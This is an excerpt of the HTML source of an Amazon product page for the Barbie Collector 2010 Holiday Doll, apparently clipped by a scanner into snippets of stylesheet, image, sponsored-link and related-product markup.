<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_AA300_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL75_AA30_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/510rZwhP%2BnL._SL75_AA30_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/510N7COnWtL._SL75_AA30_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td id="prodImageCell" height="300" width="300" style="padding-bottom: 10px;"><img onclick="if(1 ){ async_openImmersiveView(event);} else {openImmersiveView(event);}" class="prod_image_selector" style="cursor:pointer;" onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_AA300_.jpg" id="prodImage"/></td>
...[SNIP]...
</td>
<img id="loadingImage" src=http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif style="position: absolute; z-index: 200; display:none">
</tr>
...[SNIP]...
<td class="tiny"><img style="cursor:pointer;" onclick="if( 1 ) { async_openImmersiveView(event);} else {openImmersiveView(event); }" src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL75_AA30_.jpg" width="30" height="30" border="0" /></td>
...[SNIP]...
<td class="tiny"><img style="cursor:pointer;" onclick="if( 1 ) { async_openImmersiveView(event);} else {openImmersiveView(event); }" src="http://ecx.images-amazon.com/images/I/510rZwhP%2BnL._SL75_AA30_.jpg" width="30" height="30" border="0" /></td>
...[SNIP]...
<td class="tiny"><img style="cursor:pointer;" onclick="if( 1 ) { async_openImmersiveView(event);} else {openImmersiveView(event); }" src="http://ecx.images-amazon.com/images/I/510N7COnWtL._SL75_AA30_.jpg" width="30" height="30" border="0" /></td>
...[SNIP]...
<em>FBA items qualify for FREE Super Saver Shipping and <img src="http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif" width="92" alt="Amazon Prime" height="12" border="0" />.</em>
...[SNIP]...
ef="/Toys-Savings-Event/b/ref=amb_link_355070242_1?ie=UTF8&node=668401011&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=hero-quick-promo&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=1286310622&pf_rd_i=B0037UT1LY"><img src="http://g-ecx.images-amazon.com/images/G/01/img10/x-site/winter-post-holiday/75/winter-savings_75._V205521826_.gif" align="left" alt="Save on Toys and Games" border="0" /></a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=" rel="nofollow">2011 <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAS0r-Pb7PXpRVHTTdwALLVghbOoNBw.TF72Ig5FIC0HFlut61mHtvJjSkGsuImGdmSQn-cZ2sB7bMojeaD4QY0Mk8OR5PtpvvXfAdx0Y5AZx0KppK9OStSJRbTTa6Z3g9qTvjpzsiXrjayxgGwte0Eke6KnYKUEdMYotSAn5rEz-1YG3pAz8N.eUfozaSXt-7jlpBi6AbKqWElsCI4YROFPzDP.xbYJGxzj15KkaKahDTc0AON1HzrfQgm4fyiWwVE6MewhasjvBuA6O.i3cqXaeLSqRqnmRiw-1.1V79FMjAqz6474Uq3S5eF2evMuz4MoPAuCbACbiWN.MZ8C-LK63j9sJprj9St1C35.FXKqETsj1oeiG8ECoBqnSBkUWpEHs.vYyhRheFBFff9sYR-x303et1g10QTwnVwqoesYryspyuyWj625JmInfyGnX7LMwATP73mHqupPy0Qu3IqSrc4zQd7-1xJ7ZaPPCK5hXwFwssqmTjpsmHuHedeHVkUh87ofig20cv8EMeoVqjXKJc0AgPMbBsZq-QW-Cwvs6JR8RyYpkhMSCVixv7XzcLGgKMYGBDAwFfVs1QtXevPiI5bf2tseTEpw2KQoTlTHdUci0tQUe-vB-k5cVv3TCclFqra-nfXIHJT371v5tAMmzPWm7DzwZST8eKQtaj5&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">yahoo.com</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALGVSGm7UFdxuWu68HoORrLIuqmXs0YMpRyYcw8fsjjSaj2qaDPp-aInn1GmA8.a0JJgATPsIckf5mZIL-zLYhbHvGN9KflWbA-mlmvpHo36zn.FHToVxPVThK9wT8PYdCPAdjuremYH2doh3.NeZrVSOYchWObIZCmtSJyQKY8mtrkL7tvukdR0ZuuvWcwQ5J2NmoSskL7FfZUAIere3na68e1m3ughtZzxGeECLIfSxMEeWACCmqoeyTZ6pmaW7GK3MQpA0QIlh-6pQetLEQHafOZeaaO7wIYyGURXFW45ga43PCvc4uP6.NB3Y2E3c-RwyE7kG3uPkcbx5m3A5lvBJ5pALAOOKm.sh1fhodkmi8npP4rNCPgCBOXsHmuXK2li0ecM5P7Rq9tSXivDuwQgkMWTZOtvSEAGgK2HU53NrX9Yx.Jk1q0u-Xj6nUdphp3LUNdm6iXpgGLxROmiS04BSHUU4IPUl5y2Gxetj0YN99GFQlGQoACFCwWJSz3CE1fAZh.M19ZOt8CWhcYXagmWzS4oiNlEiDYOKCuoC3Y5W0JJn-jWAjA3193LxGGaqb2HPLat1GQaBY3yMzwwhL41X8w.qrXS1jBOI2ZbJfXR79LcmhWjQssNYVNVFD.zATLOcU2pBY-Oa3WDQnx8mEo3QrWXnuoUmenb8XIbOs2c2L1iQhF5vjcqGVNsyTyFfAcZc8kIUS0DvzwWe7xG5vv8nGNmlRRsOg__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.angelicdreamz.com</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=" rel="nofollow">Antique <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHXqlZHU3.7qp5hfMEdPj9rlfXJFavr1hNHNmk7fH5cikHOvZClbY.mrVpbGwM3lO9-XgafQQ6egJUSF48Nrl0B2x2vrG56YUlHWc.OYP8OdoamNrWr3OXhVbO.bVVBJ2J8MPfDKbHAkNn1DM.Uc4CEU0P2PL1uraPJhOJ4M1b5b5FBx8siS2PENAiQs3VmBwRSSf5s8wQaJpywUnTJKT7XiNu-IV0sB-vEK4DSygG7XMt2PZIhuQMEMSU62othtqa1vCm8-Se-ivcB4tYAAPrIiFRasZpoBvzafAqDJqf4fVvftGehF7ekssxceMDBggeJ5S-Gv5G5wua7xNPfRLtDvSRC2F9jm.7ymWto99.M330.DDoe75M8ZHASAbT3wLxnIGjEITuPmVq0tRlfYzSQFWXOhFjyUYrPGSSghKi2FTHRTB97lSjA5kmzhvsXqvaUUSxmolehtE02ikcoLSlaEJ9uw0iTH3w5SD6pihbg2I7IsJHQTCs3P2eqQ9OsreskfL.mSGe0SSE20DFKiw0g_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.ask.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Barbie-Collector-2010-Holiday-Doll/dp/B0037UT1LY/ref=pd_bxgy_t_img_a"><img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_SS75_.jpg" width="75" alt="Barbie Collector 2010 Holiday Doll" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R6589-Barbie-Holiday-Wishes/dp/B0038L88JS/ref=pd_bxgy_t_img_b"><img src="http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg" width="75" alt="Barbie Holiday Wishes Doll" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Barbie-Collector-Generations-Dreams-Doll/dp/B001RECPGU/ref=pd_bxgy_t_img_c"><img src="http://ecx.images-amazon.com/images/I/51TWHoafZSL._SL500_SS100_.jpg" width="75" alt="Barbie Collector Generations of Dreams Doll" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51jjsj2wFxL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/411F19H8x1L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41f1rr4L%2BML._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51TWHoafZSL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/31hMpHoc2DL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div id="mainItemImageContainer">
<img src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SL500_SY90_.jpg" width="75" alt="" style="padding-left:8px;padding-right:7px" id="mainItemImage" class="product-image" height="90" border="0" />
</div>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R4205-Barbie-Glam-Convertible/dp/B002MUANJO/ref=acc_glance_t_ai_BST_t_1" title="Barbie Glam Convertible">
<img src="http://ecx.images-amazon.com/images/I/413IWNaJz3L._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Power-Wheels-Barbie-Lil-Quad/dp/B0015KXFB0/ref=acc_glance_t_ai_BST_t_2" title="Power Wheels Barbie Lil' Quad">
<img src="http://ecx.images-amazon.com/images/I/41%2BpLzpausL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R4186-Barbie-Vacation-House/dp/B002MUANJE/ref=acc_glance_t_ai_BST_t_3" title="Barbie Glam Vacation House">
<img src="http://ecx.images-amazon.com/images/I/51BB1EyyLtL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-R4206-Barbie-Glam-Pool/dp/B002MUANJY/ref=acc_glance_t_ai_BST_t_4" title="Barbie Glam Pool">
<img src="http://ecx.images-amazon.com/images/I/51oxVpLW5YL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-P7617-Barbie-Nikki-Styling/dp/B002PUEFV8/ref=acc_glance_t_ai_BST_t_5" title="Barbie Nikki Styling Head">
<img src="http://ecx.images-amazon.com/images/I/51WHCULPM4L._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Mattel-P7615-Barbie-Styling-Head/dp/B002DPVAWW/ref=acc_glance_t_ai_BST_t_6" title="Barbie Styling Head">
<img src="http://ecx.images-amazon.com/images/I/41HxXrCGmlL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51tdfS%2B868L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CPFZJ47lL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51%2BpSBoabkL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/31hMpHoc2DL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41G5UMbKBhL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/410818FOEqL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/community-teasers/barbie._V192250991_.jpg" width="151" alt="" class="customer-image" height="42" border="0" /> <div class="time-text">
...[SNIP]...
<div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/default_teaser._V192250129_.jpg" width="122" alt="" class="customer-image" height="42" border="0" /> <div class="time-text">
...[SNIP]...
<div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/community-teasers/doll._V192251098_.jpg" width="162" alt="" class="customer-image" height="42" border="0" /> <div class="time-text">
...[SNIP]...
t-I-want/lm/R13998AI7A80VS/ref=cm_lmt_dtpa_f_1_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=listmania-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=496996711&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/51w2-pY%2B9AL._AA60_.jpg" width="60" alt="What I want!" height="60" border="0" /></a>
...[SNIP]...
ish-List/lm/R1BSQFUHQQSETZ/ref=cm_lmt_dtpa_f_2_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=listmania-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=496996711&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/31eKwdL%2BIgL._AA60_.jpg" width="60" alt="Christmas Toys &amp; Gift Wish List 2010: What my 8-year-old girl loves!" height="60" border="0" /></a>
...[SNIP]...
ollection/lm/RHLTSTXERU8OG/ref=cm_lmt_dtpa_f_3_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=listmania-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=496996711&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/41xM31QiwdL._AA60_.jpg" width="60" alt="My Wii Collection" height="60" border="0" /></a>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
tguides/fullview/R16DPIU6QDOOEF/ref=cm_syt_dtpa_f_1_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=sylt-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=498059871&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/51NP8V7GvbL._AA60_.jpg" width="60" alt="know the hot toys of 2010 on kids holiday wishlists" height="60" border="0" /></a>
...[SNIP]...
tguides/fullview/R2NKCTKZYQEXPL/ref=cm_syt_dtpa_f_2_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=sylt-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=498059871&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/51QgCA4XxTL._AA60_.jpg" width="60" alt="Play fun video games with non-gamers" height="60" border="0" /></a>
...[SNIP]...
tguides/fullview/R12EYZNKPS5AE1/ref=cm_syt_dtpa_f_3_rdssss0/188-3953038-0825847?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=sylt-center&pf_rd_r=17DR8YMYSFMRZS8CDJ3Y&pf_rd_t=201&pf_rd_p=498059871&pf_rd_i=B0037UT1LY"><img src="http://ecx.images-amazon.com/images/I/41o%2Bt3fNSCL._AA60_.jpg" width="60" alt="find a gift for a pre-school princess (3-5 year old girl)" height="60" border="0" /></a>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

